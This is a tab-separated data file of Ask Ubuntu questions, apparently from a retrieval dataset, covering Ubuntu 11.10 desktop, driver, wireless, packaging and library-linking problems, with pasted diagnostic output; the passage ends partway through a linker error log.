69191	can not change default fonts in kubuntu	i 've installed a clean kubuntu ( 64bits ) 11.10 with ati propietary drivers ( 11.8 ) and everything runs smooth and clean , but i can not change the fonts for applications , menus , captions , etc . i can select them but the font does n't change , it 's blocked . i do n't find any related bug or anyone in google reporting something similar . any light about this ? can you change fonts ?
69196	can i have old gnome 2 in ubuntu 11.10 ?	how can i install old gnome-2 in ubuntu 11.10 ? i 'm aware of gnome-session-fallback but i do n't like it : no system menu , large panel , effects are not working , and ( most important ) lack of configuration programs and ugly theme . and i ca n't stay on 11.04 because of this bug https : //bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-ati/+bug/837212 that is fixed in kernel 3.0 so i need to install ubuntu 11.10 to use the new kernel but i want to have old gnome-2 desktop and old gnome-2 programs . i tried to just install kernel 3 from ubuntu ppa but virtualbox is not working with that kernel ... it 's strange because it works in ubuntu 11.10 with the same kernel . i tried to revert to 10.04 but it feels slow for me . i really do n't have time for unity/gnome shell/gnome 3 tweaking , i just want to continue my work and have a stable system without additional headache .
69201	compiz crash leaves no usable interface	i 've reinstalled ubuntu probably over 15 times now because of this and another problem ( i 'll talk about this later ) . i 'm new to ubuntu and a week ago i just wanted to try the os out . i installed it as a dual-boot alongside windows 7 . when i started it up for the first time i was enticed to play with it . i install my video card drivers and then fine that i can install a newer version . ( i have an ati radeon hd 4670 ) i research and find tutorials on how to do all the things . sometimes when i 'm doing certain things , like apt-get update or downloading new stuff with either software center or synaptic , the unity interface just disappears , this includes the system tray at the top . so i ca n't do anything but restart . i press restart and it takes me to the login screen . then from there i have to press restart again to finally restart . when ubuntu starts up again , i log in and the boot sound plays . then the system tray is back , but not fully , like what you can see from the screenshot . now i 've said that this has happened many times and i 've reinstalled ubuntu all this time . but the most recent occurrence happened just a little while before i 'm typing this . i 'm tired of having to reinstall over and over again . sometimes i even set up everything all well and have my programs and it happens . what just happened is i was installing restricted codecs stuff on synaptic . i waited patiently for the files to download ( slow because i 'm from malaysia but the malaysia server does n't have all files and i have to use main server ) . finally it says it 's installing the files , so i continue browsing on mozilla while waiting for it to be done . then a window pops up asking me whether i agree to the terms to install something ; ca n't remember which . the moment i clicked on the agree box , i got kicked out of the system and back into the login screen . i login and say `` not again ! '' sometimes going to certain settings in compiz also causes this.. the other problem i speak of is starting in an unsupported monitor mode . i know this is because of faulty driver installation so i wo n't ask about this . so please , any help is appreciated ! i really like ubuntu but i ca n't keep installing it like this over and over again ! . thanks in advance .
69207	why does logging in to unity session take so long ?	when i 'm logging in to unity in 11.10 it takes about 15-20 seconds for the desktop to be ready . when i compare that to the loading times of 10.04 where it 's almost instant there is a huge discrapancy in log in times . is gnome3/unity really that massive to not be loaded faster ? please no unnecessary comments about : autostart applications as i set none ( at least not by autostart option via cog ) . bootup-manager as i reduced the processes there to a minimum
69208	how do i switch between unity and unity 2d without logging out ?	i really like both unity and unity 2d . they currently have different issues , meaning that one does not have the issue the other has . for instance , when i play battle for wesnoth , then it integrates nicely with the global menu on unity 2d , but not so well on unity . so i tend to switch to unity 2d while playing it , since i can then use my other monitor without switching between windowed and fullscreen mode . there are other cases as well . however , for me , that currently means logging out and back in . i know that this is n't necessary , so i was wondering exactly what to do to switch between them in-place , without logging out .
69209	why are overlay scrollbars in eclipse enabled on 64bit but disabled on 32bit ?	i was using a 64bit ubuntu but decided to switch to 32bit . now , my eclipse does not display overlay scrollbars anymore , but instead uses the old scrollbars . so why are they disabled on ubuntu 11.10 32bit ?
69211	how to remove dependencies of webmin post apt-get -- purge remove	i removed webmin , as i no longer needed it . but i removed it with apt-get -- purge remove , thinking it would remove dependencies and simply retrace back what it did during installation . it turns out i was wrong , and aptitude or -- auto-remove had to be used . i would like to keep my machine clean of unneeded scripts and installs . how do i remove stuff probably has been left behind ?
69215	hgsubversion does n't find python bindings	i upgraded to 11.10 yesterday , and since then the hgsubversion extension of mercurial no longer find the python bindings . abort : no compatible bindings available : subversion 1.5.0 or later required , but no bindings were found subvertpy 0.7.4 or later required , but not found please install either subvertpy or the subversion python swig bindings ! however , both this packages are currently installed ( version 1.6.12dfsg-4ubuntu5 for python-subversion and version 0.8.3-1 for python-subvertpy ) . initially i was using hgsubversion pulled from their mercurial repository , which i had to update following mercurial update , so i 'm now at revision 836 ( october 12th ) . as i saw there was now a package for hgsubversion in the repository ( do n't know when it has been added ) , i tried with that version as well , but to no avail . so far , here 's what i tried to fix the problem or help diagnose : i reinstalled subversion , mercurial , python and both bindings package . i noticed i had python 2.6 and python 2.7 , so i removed python 2.6 . forcing the use of subvertpy with hgsubversion_bindings= '' subvertpy '' : abort : subvertpy 0.7.4 or later required , but not found ! forcing the use of swig bindings with hgsubveersion_bindings= '' swig '' : abort : subversion 1.5.0 or later required , but no bindings were found ! tried using alternatively both the ubuntu package version of hgsubversion ( 1.2.1-2.1 ) and the latest version pulled from hgsbuversion repository . does anyone know why would that happen and what should i have to do to fix it ? thank you . edit : forgot a few version informations python -- version python 2.7.2+ package version : 2.7.2-5ubuntu1 hg version mercurial distributed scm ( version 1.9.1 ) package version : 1.9.1-1ubuntu0.1
69221	adding user to a group - why had to reboot ?	i was not able to access the virtualbox shared folder , so i made the user part of the vboxsf group . but , still not able to access it . rebooting the guest resolved the problem . is it a bug ? a reboot is not required to add a user to a group . sudo usermod -a -g vboxsf praveensripati there was similar query here . i am using 11.10 and do n't remember seeing similar behavior in 11.04 .
69223	how can i stop unity from lagging and freezing ?	my ubuntu 11.10 is n't working properly , unity has freezes and lags when i launch a program , launch dash , workspace switcher ... ..etc.a friend of mine told me to decrease the shared memory ( from bios ) from 256 to 128mb , i did that and unity was working perfect with no freezes at all but 90 % of boot times unity does not load so i set shared memory back to 256mb.how can i fix that.thank you . graphic card : geforce 7025 / nforce 630a ( built in )
69224	how do i get 'main menu ' back ?	in 11.04 and previous editions of ubuntu , i used the 'main menu ' tool ( under 'system/preferences ' ) to change individual icons that i did not like in the icon theme i use ( faenza , and mainly the firefox icon is what i like to change ) . i now do n't have the 'main menu ' and i ca n't find it in synaptic . do you know how i can add this back or install it ? is there a new way to do this with 11.10 . to me , it seems ubuntu has gotten harder to set up the way i like with this edition . thanks for help .
69226	inserting usb drive into netbook using 11.10 activates movie player	when i insert a memory stick into my samsung n150plus netbook using 11.10 , instead of file manager opening ( as happened previously ) , now movie player opens up . where is the setting to change the default application that opens when a memory stick is inserted ? thanks in advance .
69229	do usbs with hybrid images content require boot flag ?	i want use hybrid image to create an usb ubuntu installer . all i know at this point is that i need to paste the contents of the iso directly into a usb partition , but will it work without boot flag ?
69230	how to install colour profile screen device not listed	under natty i had a lovely .icc calibration file for my laptop 's screen . it 's awful without it . under oneiric , when i go to 'color ' in the settings manager only my webcam is listed in the devices that can be colour managed . so i ca n't install my .icc profile . i 've installed all the gcm/argyl stuff but that has n't got me anywhere either . how can i ( re ) install my colour profile ? ( i now consider this a bug . report filed on launchpad , please mark it as affecting you if it does )
69234	centrino advanced-n 6230 and bluetooth wireless problems with dell xps 15z	i 've been have a lot of problems with getting my wireless to work reliably on my dell xps 15z . there 's a lot of talk about this on other forums , and it appears to have something to do with the bluetooth interfering with the wireless . so , to explain where i 'm at : i can get connected for about 15 minutes before it disconnects and wo n't connect again . selecting my network from the list just makes it sit there for a while before it asks me for the password again . the other thing which is very strange and very annoying is that if i disable bluetooth via the gnome panel ( b - > disable bluetooth ) , it turns off both the bluetooth and the wireless , and then i ca n't turn it back on because it claims that `` wireless is disabled by hardware switch '' , and the same for the bluetooth . even restarting from here does n't help . the actual hardware switch ( fn + f2 ) does nothing at all , unless i boot into windows , which is obviously less than satisfactory . so ! i do n't use any bluetooth devices at all , so perhaps if i actually disable it , then the wireless might come back . but i do n't know how to do that ... any help or advice ? debugging information : $ sudo lspci -nn 00:00.0 host bridge [ 0600 ] : intel corporation 2nd generation core processor family dram controller [ 8086:0104 ] ( rev 09 ) 00:01.0 pci bridge [ 0604 ] : intel corporation xeon e3-1200/2nd generation core processor family pci express root port [ 8086:0101 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0126 ] ( rev 09 ) 00:16.0 communication controller [ 0780 ] : intel corporation 6 series/c200 series chipset family mei controller # 1 [ 8086:1c3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 [ 8086:1c2d ] ( rev 05 ) 00:1b.0 audio device [ 0403 ] : intel corporation 6 series/c200 series chipset family high definition audio controller [ 8086:1c20 ] ( rev 05 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 1 [ 8086:1c10 ] ( rev b5 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 2 [ 8086:1c12 ] ( rev b5 ) 00:1c.3 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 4 [ 8086:1c16 ] ( rev b5 ) 00:1c.4 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 5 [ 8086:1c18 ] ( rev b5 ) 00:1c.5 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 6 [ 8086:1c1a ] ( rev b5 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 [ 8086:1c26 ] ( rev 05 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation hm67 express chipset family lpc controller [ 8086:1c4b ] ( rev 05 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller [ 8086:1c03 ] ( rev 05 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 6 series/c200 series chipset family smbus controller [ 8086:1c22 ] ( rev 05 ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation device [ 10de:0df5 ] ( rev a1 ) 03:00.0 network controller [ 0280 ] : intel corporation centrino advanced-n 6230 [ 8086:0091 ] ( rev 34 ) 04:00.0 usb controller [ 0c03 ] : nec corporation upd720200 usb 3.0 host controller [ 1033:0194 ] ( rev 04 ) 05:00.0 system peripheral [ 0880 ] : jmicron technology corp. sd/mmc host controller [ 197b:2392 ] ( rev 30 ) 05:00.2 sd host controller [ 0805 ] : jmicron technology corp. standard sd host controller [ 197b:2391 ] ( rev 30 ) 05:00.3 system peripheral [ 0880 ] : jmicron technology corp. ms host controller [ 197b:2393 ] ( rev 30 ) 05:00.4 system peripheral [ 0880 ] : jmicron technology corp. xd host controller [ 197b:2394 ] ( rev 30 ) 06:00.0 ethernet controller [ 0200 ] : atheros communications ar8151 v2.0 gigabit ethernet [ 1969:1083 ] ( rev c0 ) $ sudo lshw -class network *-network disabled description : wireless interface product : centrino advanced-n 6230 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 34 serial : 88:53:2e:37 : d8:45 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlagn driverversion=3.0.0-12-generic firmware=17.168.5.1 build 33993 latency=0 link=no multicast=yes wireless=ieee 802.11abgn resources : irq:19 memory : f1b00000-f1b01fff i removed the ethernet eth0 information for brevity $ iwconfig wlan0 ieee 802.11abgn essid : off/any mode : managed access point : not-associated tx-power=off retry long limit:7 rts thr : off fragment thr : off power management : off $ rfkill list 0 : dell-wifi : wireless lan soft blocked : yes hard blocked : yes 1 : dell-bluetooth : bluetooth soft blocked : yes hard blocked : yes 2 : phy0 : wireless lan soft blocked : no hard blocked : yes added note : after booting to windows and re-enabling the wireless with the hotkey , then restarting in ubuntu again , the rfkill output says 'no ' to all options , and it connects happily to network . iwconfig now looks like this : wlan0 ieee 802.11abgn essid : '' kokomo '' mode : managed frequency:2.437 ghz access point : e0:46:9a:09:94 : d0 bit rate=2 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=70/70 signal level=-40 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:38 missed beacon:0
69239	how can i modify the icon size of the side main unity launcher ?	how can i modify the icon size of the side main unity panel on ubuntu 11.10 ? i 've tried installing the compiz configuration ( ccsm ) , but it does n't work . maybe i didnt installed compiz correctly . thanks !
69241	no graphics acceleration with an nvidia geforce 8500 gt	brand new installation of ubuntu 11.10 and then install the nvidia proprietary driver ( 280.13 ) by selecting `` additional drivers '' - > driver activated and used ( according to the same menu ) . when i type `` glxinfo '' in a terminal i get this error : x error of failed request : badwindow ( invalid window parameter ) major opcode of failed request : 137 ( nv-glx ) minor opcode of failed request : 4 ( ) resource id in failed request : 0x5400003 serial number of failed request : 32 current serial number in output stream : 32 '' lspci | grep vga '' gives : 02:00.0 vga compatible controller : nvidia corporation g86 [ geforce 8500 gt ] ( rev a1 ) before this upgrade i was on a 11.04 perfectly functional and fluids with 3d effects ... also , i work with dual screen ( configured with nvidia-settings ) and when i select the menu `` glx information '' nvidia-settings crash ... i do n't understand these errors because my environment was functional prior to `` clean '' installation ... do you have any ideas ? people in the same situation ? thank you in advance for your help .
69251	why does gnome-sushi use that much memory ?	i noticed that the sushi ( gnome-sushi ) previewer uses around 60mb of ram and wondered why it has to be so much memory , as i can only preview a single image/sound file at a time ? eog ( eye-of-gnome ) the default picture viewer uses around 30mb and deadbeef a lightweight music player around 10mb ram and they are n't that much slower in showing up .
69252	libdjvulibre21 failed installation/upgrade to version 11.10 of ubuntu	while upgrading to version 11.10 of ubuntu , i noticed that the ( aptitude ) package libdjvulibre21 failed installation . after instllation , i was prompted that one package had failed installation , and that i execute the package manager , or run apt-get to rectify this problem . running apt-get still did not resolve the problem . instead , it produced the following log file . vasilios @ vasilios-optiplex-210l : ~ $ sudo apt-get -f install [ sudo ] password for vasilios : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libpanel-applet-4-0 libswscale0 libavutil50 libgcj-bc libcamd2.2.0 linux-headers-2.6.38-8 libftgl2 kalgebra-common libpostproc51 libpari2-gmp libavformat52 libgcj11 kalgebra linux-headers-2.6.38-8-generic gcj-4.5-jre-lib libsigsegv0 libavcodec52 gir1.2-panelapplet-4.0 gcj-4.5-base use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libdjvulibre21 the following packages will be upgraded : libdjvulibre21 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 3 not fully installed or removed . need to get 0 b/706 kb of archives . after this operation , 20.5 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 298010 files and directories currently installed . ) preparing to replace libdjvulibre21 3.5.23-3ubuntu2 ( using ... /libdjvulibre21_3.5.24-8_i386.deb ) ... unpacking replacement libdjvulibre21 ... dpkg-deb ( subprocess ) : data : internal gzip read error : ' < fd:0 > : data error' dpkg-deb : error : subprocess < decompress > returned error exit status 2 dpkg : error processing /var/cache/apt/archives/libdjvulibre21_3.5.24-8_i386.deb ( -- unpack ) : subprocess dpkg-deb -- fsys-tarfile returned error exit status 2 no apport report written because the error message indicates an issue on the local system errors were encountered while processing : /var/cache/apt/archives/libdjvulibre21_3.5.24-8_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) vasilios @ vasilios-optiplex-210l : ~ $ no matter how many times i execute apt-get i receive the same error messages . judging by this log file . it would appear that the libdjvulibre21_3.5.24-8_i386.deb package that was downloaded during the installation is broken . not sure how i can force a re-download using apt-get . as an aside , this problem would n't have anything to do with the fact that i was trying to install openoffice under ubuntu version 11.04 ? in this case , even though the installation was successful , the libreoffice icons were still being displayed on the side-bar , and the openoffice package was nowhere to be found on my system .
69253	ca n't see launcher and settings in 11.10	i am using ubuntu 11.10 . from past few days , when i choose standard ubuntu interface at startup , i can not see launcher and settings in upper right corner . i can just see desktop folders and file , edit , view , go , etc . i can use unity without any problem in ubuntu 2d interface . please help me .
69256	how can i prevent unity from grabbing keybindings ( allowing an application to handle them first ) ?	note : the answer i 've accepted works correctly in precise pangolin ( 12.04 ) . it does not work correctly in oneiric ocelot . original text : i have an application in which i want to use alt-f1 to access some specific functionality . unfortunately , unity in oneiric ocelot ( 11.10 ) grabs this key combination and shows the launcher . i would like to disable or bypass that behavior , but i have no idea how to accomplish it . i have read how do i deactivate f1 and f10 keybindings ? and looked around in all the places pointed-out there and elsewhere , in both the compizconfig settings manager and the gconf-editor . unfortunately , the alt-f1 combination is nowhere to be found or disabled . in fact i have successfully prevented gnome/compiz from intercepting the keybinding in previous distributions ( lucid lynx and older ) . can anyone tell me where i can prevent unity from interpreting my keybindings before my application has a chance to respond to them ?
69257	installing 32 bit java now that ia32-sun-java6-bin is not available	prior to 11.10 , i could install a 32 bit java side by side with the 64 bit versions using the package ia32-sun-java6-bin . it would install it in /usr/lib/jvm/ia32-java-6-sun and i could reference that directory when needing a 32 bit java . but it seems that this package was deleted in oneiric ocelot . so i was wondering whether there 's a new package taking its place ( maybe something having to do with multiarch ? ) or whether i just need to get it from sun.com or oracle.com manually .
69261	compizconfig and gnome-terminal	place windows > fixed window placement > fixed placement mode i have added window class=gnome-terminal mode = maximize but when i open new gnome terminal from console its not maximize . i also tried by title and it does n't work . i can not restart my computer , maybe i need to restart compiz ?
69263	how to modify an icon in the unity launcher ?	when i start eclipse and add it to the unity launcher , i get a ? symbol as shown in the screen shot instead of the eclipse icon . the same happens for some other applications also and i am not able to differentiate between applications in the unity launcher . also , is there a ui for easily adding launchers and quicklists ? also , how do i change the order of the icons in the launcher ?
69267	disk usage very strange	just today , my ubuntu 11.04 started prompting me that my hdd is full ... i know i am filling up my hdd fast , but its the storage partition i expect to be filling up not my 60+gb os partition . so i did a disk usage analysis and got the below : /labs is actually the storage partition first , my home folder /home/jiewmeng is said to use 58.8gb ? but the biggest few files , do n't appear to sum up to that ? counting quickly , it looks like ~1.5gb only ? looking at the 2nd image , my hdd does n't seem to be all that full at all ? is it a mistake ? update ( df -th output ) filesystem type size used avail use % mounted on /dev/sda1 ext4 68g 65g 4.0k 100 % / none devtmpfs 3.9g 680k 3.9g 1 % /dev none tmpfs 3.9g 220k 3.9g 1 % /dev/shm none tmpfs 3.9g 392k 3.9g 1 % /var/run none tmpfs 3.9g 0 3.9g 0 % /var/lock /dev/sda2 ext4 764g 561g 165g 78 % /labs /dev/sda3 ext4 69g 180m 65g 1 % /ex
69268	how to upgrade ubuntu software center to the latest version	i want to update my ubuntu software center to the latest version . is it possible ?
69269	how can i enable unity 3d on a dell xps 15 l502x ?	i am trying to get unity 3d running on ubuntu 11.10 i ran the test shared on this post how to enable unity 3d on an nvidia quadro 1000m and i got this result : me @ dell-ubuntu : ~ $ /usr/lib/nux/unity_support_test -p xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . error : unable to create the opengl context i have a dell xps 15 l502x with geforce 555m 1gb graphics card . how can i enable unity 3d with this setup ? thanks
69271	what is the ubuntu colour ?	i 'm sure you know the one i 'm talking about , that deep magenta . i would like to know it 's rgb value .
69275	after suspend , my laptop restarts instead of waking up	my laptop is vaio vpcf11m1e ubuntu 10.10 64bit after being in suspend state i press the power button to wake up , but it restarts the machine . and a clear ubuntu is coming up . but hibernating works . in windows after suspend i can resume my work
69277	france24 en streaming in firefox	i 'm not able to stream france24 en in firefox ( the stream does n't start ... ) http : //www.france24.com/en/aef_player_popup/france24_player # but i can in chromium ! do you know what could be the reason ? thanks in advance ! alessio
69280	authentication problem	i recently installed version 11.10 . while adding a user , it wants me to include an authenication password . i thought i knew it and put it in but it keeps on rejecting . i even tried other alternative passwords which i generally use . no luck there too . is there any way i can retrieve what it was that i signed up with when i downloaded and installed 11.10 ? thanks for any help you can give .
69281	hot corners not working after updating to 11.10	ubuntu newbie here . i had ubuntu for a while now , since 10.04 ( lucid lynx ) , and i was getting very comfortable at installing / uninstalling and finding my way through stuff . loved the cube etc . then came along 11.04 , the great natty narwhal , and i could no longer have my desktop cube , but after using it for a while i really got used to the so called `` hot corners '' , where it shows all desktop if mouse hits screen top left ( 0,0 ) , all windows at top right , and show desktop at bottom right . i am so used to it that ubuntu is unusable now without it , after the 11.10 upgrade . i can not get it to work no matter how hard i try . how do i go about getting them back ? why did ubuntu stop hot corners ? it was so amazingly useful ! i 've only used ubuntu for basic tasks because it was a nightmare getting my wacom table to work on it . so please give the complete details necessary , thanks .
69282	where can i find libnotify1_0.5.0-2ubuntu1_i386.deb ?	i have installed ubuntu 11.10 . i am trying to install thunderbird 8.0 and it keeps saying that it is dependent on libnotify1 ( > =0.5.0 ) . i find that libnotify1 is not installed in 11.10 . it is not listed in ubuntu web sites as a download for 11.10 . it does list it for 11.04 . does anyone know can libnotify1_0.5.0-2ubuntu1_i386.deb be install in 11.10 ? if not , how do i overcome the thunderbird dependency issue ? thanks for any help .
69283	how to upgrade my hdd and keep my ubuntu 11.10 instalation	what is the best way to upgrade my 200 gb hdd to a new one of 500 gb but - and this is the tricky part - keep my ubuntu instalation . i curently have 2 partitions hda1 with the ubuntu 11.10 instalation and another partition hda5 with the home folder . on the new hdd i want to keep the same format 1 partition with ubuntu and another with the home folder .
69285	software center errors and does n't update any more	my software center was working when i first downloaded with the new and clean installation of the os , but now its not working now . i have tried the sudo apt-get update also with no luck . i would like to download some things from the software center but its asking me to check my internet connection , then it gives me a error code of things it needs to download software from a untrusted source and i have the source list ticked . i need to know what to do on my end so that i can get it working again or is this something i need to wait for a fix ?
69286	disable geforce 540m ; use only intel integrated	after fighting nvidia optimus too long , i 've decided to give up and try to just get 3d working , using any way . i 've tried out fedora 15 , which actually worked for my computer -- nice 3d graphics , recognised my intel card and used the driver . i 'm trying to install the intel graphics on a 11.04 alienware m11x . first step i figured would be disabling nvidia , but using sudo echo `` blacklist nouveau '' > /etc/modprobe.d/blacklist-nvidia.conf says permission is denied ( yes , i definitely used sudo ) . any suggestions how to do this ? system : alienware m11x r3 [ 8gb ram , intel core i5-2537m 1.4ghz ( 2.3ghz turbo mode , 3mb cache ) , nvidia geforce gt540 graphics with 1.0gb video memory and optimus ]
69295	screens do n't work after shutting off	when my screens shut off after the configured amount of time , they do n't turn back on again . i have to restart my computer because wiggling my mouse , etc does n't turn the monitor signals back on . under what package should i file this bug ? i have a dual monitor setup with nvidia twinview .
69299	how do i log into a gnome session ?	i 've upgraded my ubuntu installation from 11.04 to 11.10 . if i choose gnome at the lightdm login screen the system logs me into a unity session . if i choose any other option the system logs me also into a unity session ( i 've installed fluxbox as well and it is not possible to start a fluxbox session ) . does somebody has the same problem or could point me to the right log file to check for this problem ?
69300	how do i get two finger scrolling to work when the mouse is over a flash object ?	two finger vertical and horizontal scrolling works fine except when the mouse moves over a flash object like a youtube video . it then stops working and nothing happens with two finger scrolling until i manually find a point on the screen that is n't the flash . how do i get this working ?
69302	what is different on the server versions of 11.10 and 10.04 ?	i was wondering if it 's worth to upgrade to 11.10 if i have 10.04 as a server . what do i notice as different if i have a server ? ( not the gui as for the desktop ) is there a list of stuff that is new/improved for the server releases ? what packages are different that i will notice as a user ?
69305	how do i disable the calendar events section in gnome shell 's clock applet ?	i 'm running gnome-shell 3.2.0 and when i click the clock applet in the middle of the top panel , the following shows up : i have no need for the entire right part , right of the dotted line , which is dedicated to the `` online accounts '' integration with evolution 's calendar . is there a way to remove/disable it , so i can just have the date part of the calendar applet ( left of the dotted vertical line ) ? i just like to browse the dates to see how many days are left in the month and stuff like that . i use google 's web interface for my `` calendaring '' .
69306	tilde and double quote keys do n't work on the command line	i 've just installed ubuntu server 11.10 and the tilde ( ~ ) and double quotes ( `` ) keys do n't do anything - they do n't print to the screen . i 'm only using the command line ( no gui ) and many tutorials say to use setxkbmap and xmodmap which are n't working for me .
69309	in ubuntu 11.04 when i click on the trash icon , and it opens up music player ?	i 've got dell laptop vostro intel i3 , ram 3gb dd3 . i bought it with ubuntu 8 , than upgrade to 10.10 and everything was perfect . yesterday i upgrade to 11.04 and the system run too slaw , time on time the screen freeze . when turn on the laprop , before ubuntu welkome screen there are system heking and on some positions are error ! that 's never happent before also when i click on the trash icon it opens ubuntu 's media player . i want to downgrade to 10.10 it is more stable . how can i do this ? to get back 10.10 and to keep my data safe ? thank you ! p.s sorry my english : - )
69312	mic works in sound recorder but in nothing else	mic only works in sound recorder and although it works there its just a bunch of static underneath the spoken word , but audible . in skype , cheese , and using `` arecord test.wav '' at the terminal , it 's the same static/white noise with nothing i 'm saying being recorded . i 'm using a gateway lt2016u ( kav60 ? ) and not sure where to begin . tweaking alsamixer yields no result , but if it works in one app should n't it work in all ?
69316	problems with linking gsl / cblas	edit : problem resolved , see my answer below . is there a problem with the gsl library in oneiric ? i 'm having trouble linking and do n't understand why -- this works fine in 10.4 , 10.10 , and 11.4 . edit : small test cases first , full problem is below : works fine on natty : $ cat /etc/issue ubuntu 11.04 \n \l $ cat gsl-test.cpp # include < gsl/gsl_errno.h > void handler ( const char * , const char * , int , int ) { } int main ( ) { gsl_set_error_handler ( handler ) ; } $ g++ gsl-test.cpp # # expect problems since libraries not linked in /tmp/ccnjundv.o : in function `main ' : gsl-test.cpp : ( .text+0x16 ) : undefined reference to `gsl_set_error_handler' collect2 : ld returned 1 exit status $ g++ -lgsl -lgslcblas gsl-test.cpp $ ./a.out $ fails on oneiric : $ cat /etc/issue ubuntu 11.10 \n \l $ cat gsl-test.cpp # include < gsl/gsl_errno.h > void handler ( const char * , const char * , int , int ) { } int main ( ) { gsl_set_error_handler ( handler ) ; } $ g++ gsl-test.cpp /tmp/ccwkjmov.o : in function `main ' : gsl-test.cpp : ( .text+0x16 ) : undefined reference to `gsl_set_error_handler' collect2 : ld returned 1 exit status $ g++ -lgsl -lgslcblas -lm gsl-test.cpp /tmp/ccv0uix5.o : in function `main ' : gsl-test.cpp : ( .text+0x16 ) : undefined reference to `gsl_set_error_handler' collect2 : ld returned 1 exit status but this works on oneiric : $ g++ gsl-test.cpp -lgsl -lgslcblas $ ./a.out i suspect there 's some difference in how g++ is working ( 4.6.1 vs. 4.5.2 ) . edit : $ nm /usr/lib/libgslcblas.so nm : /usr/lib/libgslcblas.so : no symbols $ nm /usr/lib/libgslcblas.a|grep 'cblas_zher2k\|cblas_dtrsm\|cblas_zhemm' 00000000 t cblas_dtrsm 00000000 t cblas_zhemm 00000000 t cblas_zher2k and here 's the full problem , which seems to have a bit of a different flavor than my test case above , since it still is n't fixed by putting -lgsl -lgslcblas at the end of the line : /usr/bin/c++ -g -o2 -o2 -g -wl , -bsymbolic-functions cmakefiles/css.dir/main.cpp.o -o ../../../bin/css -rdynamic ../../../lib/libtemt.so.5.2.3 -lcoin -lquarter -lqtopengl -lqtwebkit -lqtgui -lqtxml -lqtxmlpatterns -lqtnetwork -lqtcore -lode -lgslcblas -lgsl -lglu -lgl -lsm -lice -lx11 -lxext -lz -lreadline -lreadline -ltermcap -wl , -rpath , /tmp/emergent-5.2.3/build/lib : /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_zher2k' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_dtrsm' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_zhemm' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_sgemv' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_dgemm' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_drotg' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_sscal' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_cdotc_sub' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_ssymm' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_zherk' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_caxpy' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_scasum' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_dgemv' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_cgemm' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_isamax' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_dtrsv' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_sswap' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_cher2' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_dasum' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_cgeru' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_csscal' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_chemm' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_ctrsv' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_icamax' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_scnrm2' 